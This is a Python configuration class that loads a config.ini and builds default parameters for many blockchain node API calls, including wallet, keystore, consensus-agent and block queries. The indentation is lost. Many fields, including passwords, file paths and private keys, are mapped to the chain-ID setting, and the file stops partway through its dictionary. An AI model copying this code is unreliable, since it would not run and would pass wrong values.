# change user_settings to suit
# for use in api calls
# fill in your default params here
from configparser import ConfigParser
class UserSettings(object):
def __init__(self):
config_parser = ConfigParser()
config_file = "user_settings/config.ini"
config_parser.read(config_file)
config_sections = config_parser.sections()
usr_config_ini_d = dict()
for section in config_sections:
options_c = config_parser.options(section)
for op in options_c:
conf_val = config_parser.get(section, op)
usr_config_ini_d.update({op: conf_val})
self.usr_config_ini_d = usr_config_ini_d
ucid = usr_config_ini_d
self.user_set_dict = {
"z0_ADD_ADDRESS_PREFIX_prefix": ucid.get('my_addressprefix'),
"z1_AC_CREATE_ACCOUNT_chainId": ucid.get('my_chainid'),
"z1_AC_CREATE_ACCOUNT_count": ucid.get('my_chainid'),
"z1_AC_CREATE_ACCOUNT_password": ucid.get('my_password'),
"z2_AC_CREATE_CONTRACT_ACCOUNT_chainId": ucid.get('my_chainid'),
"z3_AC_CREATE_MULTI_SIGN_ACCOUNT_chainId": ucid.get('my_chainid'),
"z3_AC_CREATE_MULTI_SIGN_ACCOUNT_pubKeys": ucid.get('my_pubkeys'),
"z3_AC_CREATE_MULTI_SIGN_ACCOUNT_minSigns": ucid.get('my_minsigns'),
"z4_AC_CREATE_MULTI_SIGN_TRANSFER_chainId": ucid.get('my_chainid'),
"z4_AC_CREATE_MULTI_SIGN_TRANSFER_inputs": ucid.get('my_inputs'),
"z4_AC_CREATE_MULTI_SIGN_TRANSFER_outputs": ucid.get('my_outputs'),
"z4_AC_CREATE_MULTI_SIGN_TRANSFER_remark": ucid.get('my_remark'),
"z4_AC_CREATE_MULTI_SIGN_TRANSFER_signAddress": ucid.get('my_address'),
"z4_AC_CREATE_MULTI_SIGN_TRANSFER_signPassword": ucid.get('my_password'),
"z5_AC_CREATE_OFFLINE_ACCOUNT_chainId": ucid.get('my_chainid'),
"z5_AC_CREATE_OFFLINE_ACCOUNT_count": ucid.get('my_chainid'),
"z5_AC_CREATE_OFFLINE_ACCOUNT_password": ucid.get('my_chainid'),
"z6_AC_EXPORT_ACCOUNT_KEYSTORE_chainId": ucid.get('my_chainid'),
"z6_AC_EXPORT_ACCOUNT_KEYSTORE_address": ucid.get('my_address'),
"z6_AC_EXPORT_ACCOUNT_KEYSTORE_password": ucid.get('my_chainid'),
"z6_AC_EXPORT_ACCOUNT_KEYSTORE_filePath": ucid.get('my_chainid'),
"z7_AC_EXPORT_KEYSTORE_JSON_chainId": ucid.get('my_chainid'),
"z7_AC_EXPORT_KEYSTORE_JSON_address": ucid.get('my_address'),
"z7_AC_EXPORT_KEYSTORE_JSON_password": ucid.get('my_password'),
"z8_AC_GET_ACCOUNT_BYADDRESS_chainId": ucid.get('my_chainid'),
"z8_AC_GET_ACCOUNT_BYADDRESS_address": ucid.get('my_address'),
"z9_AC_GET_ACCOUNT_LIST_chainId": ucid.get('my_chainid'),
"z10_AC_GET_ADDRESS_LIST_chainId": ucid.get('my_chainid'),
"z10_AC_GET_ADDRESS_LIST_pageNumber": ucid.get('my_chainid'),
"z10_AC_GET_ADDRESS_LIST_pageSize": ucid.get('my_chainid'),
"z11_AC_GET_ADDRESS_PREFIX_BY_CHAINID_chainId": ucid.get('my_chainid'),
"z12_AC_GET_ALIASBY_ADDRESS_chainId": ucid.get('my_chainid'),
"z12_AC_GET_ALIASBY_ADDRESS_address": ucid.get('my_address'),
"z13_AC_GET_ALL_ADDRESS_PREFIX_chainId": ucid.get('my_chainid'),
"z14_AC_GET_ALL_PRIKEY_chainId": ucid.get('my_chainid'),
"z14_AC_GET_ALL_PRIKEY_password": ucid.get('my_password'),
"z15_AC_GET_ENCRYPTED_ADDRESS_LIST_chainId": ucid.get('my_chainid'),
"z16_AC_GET_MULTI_SIGN_ACCOUNT_chainId": ucid.get('my_chainid'),
"z16_AC_GET_MULTI_SIGN_ACCOUNT_address": ucid.get('my_address'),
"z17_AC_GET_PUBKEY_chainId": ucid.get('my_chainid'),
"z17_AC_GET_PUBKEY_address": ucid.get('my_address'),
"z17_AC_GET_PUBKEY_password": ucid.get('my_chainid'),
"z18_AC_IMPORT_ACCOUNT_BY_KEYSTORE_chainId": ucid.get('my_chainid'),
"z18_AC_IMPORT_ACCOUNT_BY_KEYSTORE_password": ucid.get('my_chainid'),
"z18_AC_IMPORT_ACCOUNT_BY_KEYSTORE_keyStore": ucid.get('my_chainid'),
"z18_AC_IMPORT_ACCOUNT_BY_KEYSTORE_overwrite": ucid.get('my_chainid'),
"z19_AC_IMPORT_ACCOUNT_BY_PRIKEY_chainId": ucid.get('my_chainid'),
"z19_AC_IMPORT_ACCOUNT_BY_PRIKEY_password": ucid.get('my_password'),
"z19_AC_IMPORT_ACCOUNT_BY_PRIKEY_priKey": ucid.get('my_chainid'),
"z19_AC_IMPORT_ACCOUNT_BY_PRIKEY_overwrite": ucid.get('my_chainid'),
"z20_AC_IS_ALIAS_USABLE_chainId": ucid.get('my_chainid'),
"z20_AC_IS_ALIAS_USABLE_alias": ucid.get('my_chainid'),
"z21_AC_IS_MULTISIGN_ACCOUNT_BUILDER_chainId": ucid.get('my_chainid'),
"z21_AC_IS_MULTISIGN_ACCOUNT_BUILDER_address": ucid.get('my_address'),
"z21_AC_IS_MULTISIGN_ACCOUNT_BUILDER_pubKey": ucid.get('my_chainid'),
"z22_AC_REMOVE_ACCOUNT_chainId": ucid.get('my_chainid'),
"z22_AC_REMOVE_ACCOUNT_address": ucid.get('my_address'),
"z22_AC_REMOVE_ACCOUNT_password": ucid.get('my_chainid'),
"z23_AC_REMOVE_MULTISIGN_ACCOUNT_chainId": ucid.get('my_chainid'),
"z23_AC_REMOVE_MULTISIGN_ACCOUNT_address": ucid.get('my_address'),
"z24_AC_SET_ALIAS_chainId": ucid.get('my_chainid'),
"z24_AC_SET_ALIAS_address": ucid.get('my_address'),
"z24_AC_SET_ALIAS_password": ucid.get('my_chainid'),
"z24_AC_SET_ALIAS_alias": ucid.get('my_chainid'),
"z25_AC_SET_MULTISIGN_ALIAS_chainId": ucid.get('my_chainid'),
"z25_AC_SET_MULTISIGN_ALIAS_address": ucid.get('my_address'),
"z25_AC_SET_MULTISIGN_ALIAS_alias": ucid.get('my_chainid'),
"z25_AC_SET_MULTISIGN_ALIAS_signAddress": ucid.get('my_address'),
"z25_AC_SET_MULTISIGN_ALIAS_signPassword": ucid.get('my_password'),
"z26_AC_SET_REMARK_chainId": ucid.get('my_chainid'),
"z26_AC_SET_REMARK_address": ucid.get('my_address'),
"z26_AC_SET_REMARK_remark": ucid.get('my_chainid'),
"z27_AC_SIGN_BLOCKDIGEST_chainId": ucid.get('my_chainid'),
"z27_AC_SIGN_BLOCKDIGEST_address": ucid.get('my_address'),
"z27_AC_SIGN_BLOCKDIGEST_password": ucid.get('my_chainid'),
"z27_AC_SIGN_BLOCKDIGEST_data": ucid.get('my_chainid'),
"z28_AC_SIGN_DIGEST_chainId": ucid.get('my_chainid'),
"z28_AC_SIGN_DIGEST_address": ucid.get('my_address'),
"z28_AC_SIGN_DIGEST_password": ucid.get('my_chainid'),
"z28_AC_SIGN_DIGEST_data": ucid.get('my_chainid'),
"z29_AC_SIGN_MULTISIGN_TRANSACTION_chainId": ucid.get('my_chainid'),
"z29_AC_SIGN_MULTISIGN_TRANSACTION_tx": ucid.get('my_chainid'),
"z29_AC_SIGN_MULTISIGN_TRANSACTION_signAddress": ucid.get('my_address'),
"z29_AC_SIGN_MULTISIGN_TRANSACTION_signPassword": ucid.get('my_password'),
"z30_AC_TRANSFER_chainId": ucid.get('my_chainid'),
"z30_AC_TRANSFER_inputs": ucid.get('my_inputs'),
"z30_AC_TRANSFER_outputs": ucid.get('my_outputs'),
"z30_AC_TRANSFER_remark": ucid.get('my_remark'),
"z31_AC_UPDATE_OFFLINE_ACCOUNT_PASSWORD_chainId": ucid.get('my_chainid'),
"z31_AC_UPDATE_OFFLINE_ACCOUNT_PASSWORD_address": ucid.get('my_address'),
"z31_AC_UPDATE_OFFLINE_ACCOUNT_PASSWORD_password": ucid.get('my_chainid'),
"z31_AC_UPDATE_OFFLINE_ACCOUNT_PASSWORD_newPassword": ucid.get('my_chainid'),
"z31_AC_UPDATE_OFFLINE_ACCOUNT_PASSWORD_priKey": ucid.get('my_chainid'),
"z32_AC_UPDATE_PASSWORD_chainId": ucid.get('my_chainid'),
"z32_AC_UPDATE_PASSWORD_address": ucid.get('my_address'),
"z32_AC_UPDATE_PASSWORD_password": ucid.get('my_chainid'),
"z32_AC_UPDATE_PASSWORD_newPassword": ucid.get('my_chainid'),
"z33_AC_VALIDATION_PASSWORD_chainId": ucid.get('my_chainid'),
"z33_AC_VALIDATION_PASSWORD_address": ucid.get('my_address'),
"z33_AC_VALIDATION_PASSWORD_password": ucid.get('my_chainid'),
"z34_AC_VERIFY_SIGN_DATA_pubKey": ucid.get('my_chainid'),
"z34_AC_VERIFY_SIGN_DATA_sig": ucid.get('my_chainid'),
"z34_AC_VERIFY_SIGN_DATA_data": ucid.get('my_chainid'),
"z35_BATCH_VALIDATE_BEGIN_chainId": ucid.get('my_chainid'),
"z36_BLOCK_VALIDATE_chainId": ucid.get('my_chainid'),
"z36_BLOCK_VALIDATE_txList": ucid.get('my_chainid'),
"z38_CANCEL_CROSSCHAIN_chainId": ucid.get('my_chainid'),
"z38_CANCEL_CROSSCHAIN_assetId": ucid.get('my_chainid'),
"z39_CHECK_BLOCK_VERSION_chainId": ucid.get('my_chainid'),
"z39_CHECK_BLOCK_VERSION_extendsData": ucid.get('my_chainid'),
"z40_CM_ASSET_chainId": ucid.get('my_chainid'),
"z40_CM_ASSET_assetId": ucid.get('my_chainid'),
"z41_CM_ASSET_CIRCULATE_COMMIT_chainId": ucid.get('my_chainid'),
"z41_CM_ASSET_CIRCULATE_COMMIT_txList": ucid.get('my_chainid'),
"z41_CM_ASSET_CIRCULATE_COMMIT_blockHeader": ucid.get('my_chainid'),
"z42_CM_ASSET_CIRCULATE_ROLLBACK_chainId": ucid.get('my_chainid'),
"z42_CM_ASSET_CIRCULATE_ROLLBACK_txList": ucid.get('my_chainid'),
"z42_CM_ASSET_CIRCULATE_ROLLBACK_blockHeader": ucid.get('my_chainid'),
"z43_CM_ASSET_CIRCULATE_VALIDATOR_chainId": ucid.get('my_chainid'),
"z43_CM_ASSET_CIRCULATE_VALIDATOR_tx": ucid.get('my_chainid'),
"z44_CM_ASSET_DISABLE_chainId": ucid.get('my_chainid'),
"z44_CM_ASSET_DISABLE_assetId": ucid.get('my_chainid'),
"z44_CM_ASSET_DISABLE_address": ucid.get('my_address'),
"z44_CM_ASSET_DISABLE_password": ucid.get('my_password'),
"z45_CM_ASSET_REG_chainId": ucid.get('my_chainid'),
"z45_CM_ASSET_REG_assetId": ucid.get('my_chainid'),
"z45_CM_ASSET_REG_symbol": ucid.get('my_chainid'),
"z45_CM_ASSET_REG_assetName": ucid.get('my_chainid'),
"z45_CM_ASSET_REG_initNumber": ucid.get('my_chainid'),
"z45_CM_ASSET_REG_decimalPlaces": ucid.get('my_chainid'),
"z45_CM_ASSET_REG_address": ucid.get('my_address'),
"z45_CM_ASSET_REG_password": ucid.get('my_chainid'),
"z46_CM_CHAIN_chainId": ucid.get('my_chainid'),
"z47_CM_CHAIN_ACTIVE_chainId": ucid.get('my_chainid'),
"z47_CM_CHAIN_ACTIVE_chainName": ucid.get('my_chainid'),
"z47_CM_CHAIN_ACTIVE_addressType": ucid.get('my_address'),
"z47_CM_CHAIN_ACTIVE_addressPrefix": ucid.get('my_address'),
"z47_CM_CHAIN_ACTIVE_magicNumber": ucid.get('my_chainid'),
"z47_CM_CHAIN_ACTIVE_minAvailableNodeNum": ucid.get('my_chainid'),
"z47_CM_CHAIN_ACTIVE_assetId": ucid.get('my_chainid'),
"z47_CM_CHAIN_ACTIVE_symbol": ucid.get('my_chainid'),
"z47_CM_CHAIN_ACTIVE_assetName": ucid.get('my_chainid'),
"z47_CM_CHAIN_ACTIVE_initNumber": ucid.get('my_chainid'),
"z47_CM_CHAIN_ACTIVE_decimalPlaces": ucid.get('my_chainid'),
"z47_CM_CHAIN_ACTIVE_address": ucid.get('my_address'),
"z47_CM_CHAIN_ACTIVE_password": ucid.get('my_chainid'),
"z47_CM_CHAIN_ACTIVE_verifierList": ucid.get('my_chainid'),
"z47_CM_CHAIN_ACTIVE_signatureBFTRatio": ucid.get('my_chainid'),
"z47_CM_CHAIN_ACTIVE_maxSignatureCount": ucid.get('my_chainid'),
"z48_CM_CHAIN_REG_chainId": ucid.get('my_chainid'),
"z48_CM_CHAIN_REG_chainName": ucid.get('my_chainid'),
"z48_CM_CHAIN_REG_addressType": ucid.get('my_address'),
"z48_CM_CHAIN_REG_addressPrefix": ucid.get('my_address'),
"z48_CM_CHAIN_REG_magicNumber": ucid.get('my_chainid'),
"z48_CM_CHAIN_REG_minAvailableNodeNum": ucid.get('my_chainid'),
"z48_CM_CHAIN_REG_assetId": ucid.get('my_chainid'),
"z48_CM_CHAIN_REG_symbol": ucid.get('my_chainid'),
"z48_CM_CHAIN_REG_assetName": ucid.get('my_chainid'),
"z48_CM_CHAIN_REG_initNumber": ucid.get('my_chainid'),
"z48_CM_CHAIN_REG_decimalPlaces": ucid.get('my_chainid'),
"z48_CM_CHAIN_REG_address": ucid.get('my_address'),
"z48_CM_CHAIN_REG_password": ucid.get('my_chainid'),
"z48_CM_CHAIN_REG_verifierList": ucid.get('my_chainid'),
"z48_CM_CHAIN_REG_signatureBFTRatio": ucid.get('my_chainid'),
"z48_CM_CHAIN_REG_maxSignatureCount": ucid.get('my_chainid'),
"z49_CM_GET_CHAIN_ASSET_chainId": ucid.get('my_chainid'),
"z49_CM_GET_CHAIN_ASSET_assetChainId": ucid.get('my_chainid'),
"z49_CM_GET_CHAIN_ASSET_assetId": ucid.get('my_chainid'),
"z50_CM_GET_CIRCULATE_CHAIN_ASSET_circulateChainId": ucid.get('my_chainid'),
"z50_CM_GET_CIRCULATE_CHAIN_ASSET_assetChainId": ucid.get('my_chainid'),
"z50_CM_GET_CIRCULATE_CHAIN_ASSET_assetId": ucid.get('my_chainid'),
"z51_COMMIT_BATCH_UNCONFIRMED_TXS_chainId": ucid.get('my_chainid'),
"z51_COMMIT_BATCH_UNCONFIRMED_TXS_txList": ucid.get('my_chainid'),
"z52_COMMIT_BLOCKTXS_chainId": ucid.get('my_chainid'),
"z52_COMMIT_BLOCKTXS_txList": ucid.get('my_chainid'),
"z52_COMMIT_BLOCKTXS_blockHeight": ucid.get('my_chainid'),
"z53_COMMIT_UNCONFIRMEDTX_chainId": ucid.get('my_chainid'),
"z53_COMMIT_UNCONFIRMEDTX_tx": ucid.get('my_chainid'),
"z55_CREATE_AGENT_VALID_chainId": ucid.get('my_chainid'),
"z55_CREATE_AGENT_VALID_tx": ucid.get('my_chainid'),
"z56_CREATE_CROSSTX_chainId": ucid.get('my_chainid'),
"z56_CREATE_CROSSTX_listFrom": ucid.get('my_chainid'),
"z56_CREATE_CROSSTX_listTo": ucid.get('my_chainid'),
"z56_CREATE_CROSSTX_remark": ucid.get('my_chainid'),
"z57_CROSSCHAIN_REGISTER_CHANGE_chainId": ucid.get('my_chainid'),
"z58_CS_ADD_BLOCK_chainId": ucid.get('my_chainid'),
"z58_CS_ADD_BLOCK_blockHeader": ucid.get('my_chainid'),
"z59_CS_ADD_EVIDENCE_RECORD_chainId": ucid.get('my_chainid'),
"z59_CS_ADD_EVIDENCE_RECORD_blockHeader": ucid.get('my_chainid'),
"z59_CS_ADD_EVIDENCE_RECORD_evidenceHeader": ucid.get('my_chainid'),
"z60_CS_CHAIN_ROLLBACK_chainId": ucid.get('my_chainid'),
"z60_CS_CHAIN_ROLLBACK_height": ucid.get('my_chainid'),
"z61_CS_CONTRACT_DEPOSIT_chainId": ucid.get('my_chainid'),
"z61_CS_CONTRACT_DEPOSIT_agentHash": ucid.get('my_chainid'),
"z61_CS_CONTRACT_DEPOSIT_deposit": ucid.get('my_chainid'),
"z61_CS_CONTRACT_DEPOSIT_contractAddress": ucid.get('my_address'),
"z61_CS_CONTRACT_DEPOSIT_contractSender": ucid.get('my_chainid'),
"z61_CS_CONTRACT_DEPOSIT_contractBalance": ucid.get('my_chainid'),
"z61_CS_CONTRACT_DEPOSIT_contractNonce": ucid.get('my_chainid'),
"z61_CS_CONTRACT_DEPOSIT_blockTime": ucid.get('my_chainid'),
"z62_CS_CONTRACT_WITHDRAW_chainId": ucid.get('my_chainid'),
"z62_CS_CONTRACT_WITHDRAW_joinAgentHash": ucid.get('my_chainid'),
"z62_CS_CONTRACT_WITHDRAW_contractAddress": ucid.get('my_address'),
"z62_CS_CONTRACT_WITHDRAW_contractSender": ucid.get('my_chainid'),
"z62_CS_CONTRACT_WITHDRAW_contractBalance": ucid.get('my_chainid'),
"z62_CS_CONTRACT_WITHDRAW_contractNonce": ucid.get('my_chainid'),
"z62_CS_CONTRACT_WITHDRAW_blockTime": ucid.get('my_chainid'),
"z63_CS_CREATE_AGENT_chainId": ucid.get('my_chainid'),
"z63_CS_CREATE_AGENT_agentAddress": ucid.get('my_address'),
"z63_CS_CREATE_AGENT_packingAddress": ucid.get('my_address'),
"z63_CS_CREATE_AGENT_rewardAddress": ucid.get('my_address'),
"z63_CS_CREATE_AGENT_commissionRate": ucid.get('my_chainid'),
"z63_CS_CREATE_AGENT_deposit": ucid.get('my_chainid'),
"z63_CS_CREATE_AGENT_password": ucid.get('my_chainid'),
"z64_CS_CREATE_CONTRACT_AGENT_chainId": ucid.get('my_chainid'),
"z64_CS_CREATE_CONTRACT_AGENT_packingAddress": ucid.get('my_address'),
"z64_CS_CREATE_CONTRACT_AGENT_deposit": ucid.get('my_chainid'),
"z64_CS_CREATE_CONTRACT_AGENT_commissionRate": ucid.get('my_chainid'),
"z64_CS_CREATE_CONTRACT_AGENT_contractAddress": ucid.get('my_address'),
"z64_CS_CREATE_CONTRACT_AGENT_contractSender": ucid.get('my_chainid'),
"z64_CS_CREATE_CONTRACT_AGENT_contractBalance": ucid.get('my_chainid'),
"z64_CS_CREATE_CONTRACT_AGENT_contractNonce": ucid.get('my_chainid'),
"z64_CS_CREATE_CONTRACT_AGENT_blockTime": ucid.get('my_chainid'),
"z65_CS_CREATE_MULTI_AGENT_chainId": ucid.get('my_chainid'),
"z65_CS_CREATE_MULTI_AGENT_agentAddress": ucid.get('my_address'),
"z65_CS_CREATE_MULTI_AGENT_packingAddress": ucid.get('my_address'),
"z65_CS_CREATE_MULTI_AGENT_rewardAddress": ucid.get('my_address'),
"z65_CS_CREATE_MULTI_AGENT_commissionRate": ucid.get('my_chainid'),
"z65_CS_CREATE_MULTI_AGENT_deposit": ucid.get('my_chainid'),
"z65_CS_CREATE_MULTI_AGENT_password": ucid.get('my_chainid'),
"z65_CS_CREATE_MULTI_AGENT_signAddress": ucid.get('my_address'),
"z66_CS_DEPOSIT_TOAGENT_chainId": ucid.get('my_chainid'),
"z66_CS_DEPOSIT_TOAGENT_address": ucid.get('my_address'),
"z66_CS_DEPOSIT_TOAGENT_agentHash": ucid.get('my_chainid'),
"z66_CS_DEPOSIT_TOAGENT_deposit": ucid.get('my_chainid'),
"z66_CS_DEPOSIT_TOAGENT_password": ucid.get('my_chainid'),
"z67_CS_DOUBLE_SPEND_RECORD_chainId": ucid.get('my_chainid'),
"z67_CS_DOUBLE_SPEND_RECORD_block": ucid.get('my_chainid'),
"z67_CS_DOUBLE_SPEND_RECORD_tx": ucid.get('my_chainid'),
"z68_CS_GET_AGENT_ADDRESS_LIST_chainId": ucid.get('my_chainid'),
"z69_CS_GET_AGENT_CHANGE_INFO_chainId": ucid.get('my_chainid'),
"z70_CS_GET_AGENT_INFO_chainId": ucid.get('my_chainid'),
"z70_CS_GET_AGENT_INFO_agentHash": ucid.get('my_chainid'),
"z71_CS_GET_AGENT_LIST_chainId": ucid.get('my_chainid'),
"z71_CS_GET_AGENT_LIST_pageNumber": ucid.get('my_chainid'),
"z71_CS_GET_AGENT_LIST_pageSize": ucid.get('my_chainid'),
"z71_CS_GET_AGENT_LIST_keyWord": ucid.get('my_chainid'),
"z72_CS_GET_AGENT_STATUS_chainId": ucid.get('my_chainid'),
"z72_CS_GET_AGENT_STATUS_agentHash": ucid.get('my_chainid'),
"z73_CS_GET_CONSENSUS_CONFIG_chainId": ucid.get('my_chainid'),
"z74_CS_GET_CONTRACT_AGENT_INFO_chainId": ucid.get('my_chainid'),
"z74_CS_GET_CONTRACT_AGENT_INFO_agentHash": ucid.get('my_chainid'),
"z74_CS_GET_CONTRACT_AGENT_INFO_contractAddress": ucid.get('my_address'),
"z74_CS_GET_CONTRACT_AGENT_INFO_contractSender": ucid.get('my_chainid'),
"z75_CS_GET_CONTRACT_DEPOSIT_INFO_chainId": ucid.get('my_chainid'),
"z75_CS_GET_CONTRACT_DEPOSIT_INFO_joinAgentHash": ucid.get('my_chainid'),
"z75_CS_GET_CONTRACT_DEPOSIT_INFO_contractAddress": ucid.get('my_address'),
"z75_CS_GET_CONTRACT_DEPOSIT_INFO_contractSender": ucid.get('my_chainid'),
"z76_CS_GET_DEPOSIT_LIST_chainId": ucid.get('my_chainid'),
"z76_CS_GET_DEPOSIT_LIST_pageNumber": ucid.get('my_chainid'),
"z76_CS_GET_DEPOSIT_LIST_pageSize": ucid.get('my_chainid'),
"z76_CS_GET_DEPOSIT_LIST_address": ucid.get('my_address'),
"z76_CS_GET_DEPOSIT_LIST_agentHash": ucid.get('my_chainid'),
"z77_CS_GET_INFO_chainId": ucid.get('my_chainid'),
"z77_CS_GET_INFO_address": ucid.get('my_address'),
"z78_CS_GET_PACKER_INFO_chainId": ucid.get('my_chainid'),
"z79_CS_GET_PUBLISH_LIST_chainId": ucid.get('my_chainid'),
"z79_CS_GET_PUBLISH_LIST_address": ucid.get('my_address'),
"z79_CS_GET_PUBLISH_LIST_type": ucid.get('my_chainid'),
"z80_CS_GET_ROUND_INFO_chainId": ucid.get('my_chainid'),
"z81_CS_GET_ROUND_MEMBER_LIST_chainId": ucid.get('my_chainid'),
"z81_CS_GET_ROUND_MEMBER_LIST_extend": ucid.get('my_chainid'),
"z82_CS_GET_SEED_NODE_INFO_chainId": ucid.get('my_chainid'),
"z83_CS_GET_WHOLEINFO_chainId": ucid.get('my_chainid'),
"z84_CS_MULTI_DEPOSIT_chainId": ucid.get('my_chainid'),
"z84_CS_MULTI_DEPOSIT_address": ucid.get('my_address'),
"z84_CS_MULTI_DEPOSIT_agentHash": ucid.get('my_chainid'),
"z84_CS_MULTI_DEPOSIT_deposit": ucid.get('my_chainid'),
"z84_CS_MULTI_DEPOSIT_password": ucid.get('my_chainid'),
"z84_CS_MULTI_DEPOSIT_signAddress": ucid.get('my_address'),
"z85_CS_MULTI_WITHDRAW_chainId": ucid.get('my_chainid'),
"z85_CS_MULTI_WITHDRAW_address": ucid.get('my_address'),
"z85_CS_MULTI_WITHDRAW_txHash": ucid.get('my_chainid'),
"z85_CS_MULTI_WITHDRAW_password": ucid.get('my_chainid'),
"z85_CS_MULTI_WITHDRAW_signAddress": ucid.get('my_address'),
"z86_CS_RANDOM_RAW_SEEDS_COUNT_chainId": ucid.get('my_chainid'),
"z86_CS_RANDOM_RAW_SEEDS_COUNT_height": ucid.get('my_chainid'),
"z86_CS_RANDOM_RAW_SEEDS_COUNT_count": ucid.get('my_chainid'),
"z87_CS_RANDOM_RAW_SEEDS_HEIGHT_chainId": ucid.get('my_chainid'),
"z87_CS_RANDOM_RAW_SEEDS_HEIGHT_startHeight": ucid.get('my_chainid'),
"z87_CS_RANDOM_RAW_SEEDS_HEIGHT_endHeight": ucid.get('my_chainid'),
"z88_CS_RANDOM_SEED_COUNT_chainId": ucid.get('my_chainid'),
"z88_CS_RANDOM_SEED_COUNT_height": ucid.get('my_chainid'),
"z88_CS_RANDOM_SEED_COUNT_count": ucid.get('my_chainid'),
"z88_CS_RANDOM_SEED_COUNT_algorithm": ucid.get('my_chainid'),
"z89_CS_RANDOM_SEED_HEIGHT_chainId": ucid.get('my_chainid'),
"z89_CS_RANDOM_SEED_HEIGHT_startHeight": ucid.get('my_chainid'),
"z89_CS_RANDOM_SEED_HEIGHT_endHeight": ucid.get('my_chainid'),
"z89_CS_RANDOM_SEED_HEIGHT_algorithm": ucid.get('my_chainid'),
"z90_CS_RECEIVE_HEADERLIST_chainId": ucid.get('my_chainid'),
"z90_CS_RECEIVE_HEADERLIST_headerList": ucid.get('my_chainid'),
"z91_CS_RUN_CHAIN_chainId": ucid.get('my_chainid'),
"z92_CS_RUN_MAINCHAIN_chainId": ucid.get('my_chainid'),
"z93_CS_STOPAGENT_chainId": ucid.get('my_chainid'),
"z93_CS_STOPAGENT_address": ucid.get('my_address'),
"z93_CS_STOPAGENT_password": ucid.get('my_chainid'),
"z94_CS_STOP_AGENT_chainId": ucid.get('my_chainid'),
"z94_CS_STOP_AGENT_address": ucid.get('my_address'),
"z94_CS_STOP_AGENT_password": ucid.get('my_chainid'),
"z95_CS_STOPCHAIN_chainId": ucid.get('my_chainid'),
"z96_CS_STOP_CHAIN_chainId": ucid.get('my_chainid'),
"z97_CS_STOP_CONTRACT_AGENT_chainId": ucid.get('my_chainid'),
"z97_CS_STOP_CONTRACT_AGENT_contractAddress": ucid.get('my_address'),
"z97_CS_STOP_CONTRACT_AGENT_contractSender": ucid.get('my_chainid'),
"z97_CS_STOP_CONTRACT_AGENT_contractBalance": ucid.get('my_chainid'),
"z97_CS_STOP_CONTRACT_AGENT_contractNonce": ucid.get('my_chainid'),
"z97_CS_STOP_CONTRACT_AGENT_blockTime": ucid.get('my_chainid'),
"z98_CS_STOP_MULTI_AGENT_chainId": ucid.get('my_chainid'),
"z98_CS_STOP_MULTI_AGENT_address": ucid.get('my_address'),
"z98_CS_STOP_MULTI_AGENT_password": ucid.get('my_chainid'),
"z98_CS_STOP_MULTI_AGENT_signAddress": ucid.get('my_address'),
"z99_CS_TRIGGER_COINBASE_CONTRACT_chainId": ucid.get('my_chainid'),
"z99_CS_TRIGGER_COINBASE_CONTRACT_tx": ucid.get('my_chainid'),
"z99_CS_TRIGGER_COINBASE_CONTRACT_blockHeader": ucid.get('my_chainid'),
"z99_CS_TRIGGER_COINBASE_CONTRACT_stateRoot": ucid.get('my_chainid'),
"z100_CS_UPDATE_AGENT_CONSENSUS_STATUS_chainId": ucid.get('my_chainid'),
"z101_CS_UPDATE_AGENT_STATUS_chainId": ucid.get('my_chainid'),
"z101_CS_UPDATE_AGENT_STATUS_status": ucid.get('my_chainid'),
"z102_CS_VALIDBLOCK_chainId": ucid.get('my_chainid'),
"z102_CS_VALIDBLOCK_download": ucid.get('my_chainid'),
"z102_CS_VALIDBLOCK_block": ucid.get('my_chainid'),
"z103_CS_WITHDRAW_chainId": ucid.get('my_chainid'),
"z103_CS_WITHDRAW_address": ucid.get('my_address'),
"z103_CS_WITHDRAW_txHash": ucid.get('my_chainid'),
"z103_CS_WITHDRAW_password": ucid.get('my_chainid'),
"z104_DEPOSIT_VALID_chainId": ucid.get('my_chainid'),
"z104_DEPOSIT_VALID_tx": ucid.get('my_chainid'),
"z105_GET_ASSETS_BY_ID_chainId": ucid.get('my_chainid'),
"z105_GET_ASSETS_BY_ID_assetIds": ucid.get('my_chainid'),
"z106_GET_BALANCE_chainId": ucid.get('my_chainid'),
"z106_GET_BALANCE_assetChainId": ucid.get('my_chainid'),
"z106_GET_BALANCE_assetId": ucid.get('my_chainid'),
"z106_GET_BALANCE_address": ucid.get('my_address'),
"z107_GET_BALANCE_NONCE_chainId": ucid.get('my_chainid'),
"z107_GET_BALANCE_NONCE_assetChainId": ucid.get('my_chainid'),
"z107_GET_BALANCE_NONCE_assetId": ucid.get('my_chainid'),
"z107_GET_BALANCE_NONCE_address": ucid.get('my_address'),
"z107_GET_BALANCE_NONCE_isConfirmed": ucid.get('my_chainid'),
"z108_GET_BLOCK_BY_HASH_chainId": ucid.get('my_chainid'),
"z108_GET_BLOCK_BY_HASH_hash": ucid.get('my_chainid'),
"z109_GET_BLOCK_BY_HEIGHT_chainId": ucid.get('my_chainid'),
"z109_GET_BLOCK_BY_HEIGHT_height": ucid.get('my_chainid'),
"z110_GET_BLOCKHEADER_BY_HASH_chainId": ucid.get('my_chainid'),
"z110_GET_BLOCKHEADER_BY_HASH_hash": ucid.get('my_chainid'),
"z111_GET_BLOCKHEADER_BY_HEIGHT_chainId": ucid.get('my_chainid'),
"z111_GET_BLOCKHEADER_BY_HEIGHT_height": ucid.get('my_chainid'),
"z112_GET_BLOCKHEADER_PO_BY_HASH_chainId": ucid.get('my_chainid'),
"z112_GET_BLOCKHEADER_PO_BY_HASH_hash": ucid.get('my_chainid'),
"z113_GET_BLOCKHEADER_POBY_HEIGHT_chainId": ucid.get('my_chainid'),
"z113_GET_BLOCKHEADER_POBY_HEIGHT_height": ucid.get('my_chainid'),
"z114_GET_BLOCKHEADERS_BY_HEIGHT_RANGE_chainId": ucid.get('my_chainid'),
"z114_GET_BLOCKHEADERS_BY_HEIGHT_RANGE_begin": ucid.get('my_chainid'),
"z114_GET_BLOCKHEADERS_BY_HEIGHT_RANGE_end": ucid.get('my_chainid'),
"z115_GET_BLOCKHEADERS_FOR_PROTOCOL_chainId": ucid.get('my_chainid'),
"z115_GET_BLOCKHEADERS_FOR_PROTOCOL_interval": ucid.get('my_chainid'),
"z116_GET_BYZANTINE_COUNT_chainId": ucid.get('my_chainid'),
"z117_GET_CIRCULAT_chainId": ucid.get('my_chainid'),
"z117_GET_CIRCULAT_nodeId": ucid.get('my_chainid'),
"z117_GET_CIRCULAT_messageBody": ucid.get('my_chainid'),
"z119_GET_CROSSTX_STATE_chainId": ucid.get('my_chainid'),
"z119_GET_CROSSTX_STATE_txHash": ucid.get('my_chainid'),
"z120_GET_CTX_chainId": ucid.get('my_chainid'),
